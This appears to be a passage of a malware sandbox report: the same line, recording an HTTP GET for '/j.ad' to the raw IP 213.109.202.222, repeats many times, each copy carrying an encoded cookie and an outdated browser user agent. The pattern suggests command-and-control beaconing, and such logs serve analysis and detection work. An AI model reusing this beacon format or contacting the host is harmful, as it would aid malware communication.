Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /j.ad HTTP/1.1Accept: /Cookie: Gif2I3v9iYKmlSvz9ceumxBLnmuli81FyKz7CMD84nk8L41JBdc0FcnQ8H0POD4cujX4gR68tT0fZpcF+3qX9IPNH/BGd7aYkdqDLiXUyY32vofA1BUIqA/z3rcJQy9Qu/5ecgAJvQ+INidT6tUGPPUPSfxlP5IKX/m2DlfI6oU=User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)Host: 213.109.202.222Connection: Keep-AliveCache-Control: no-cache
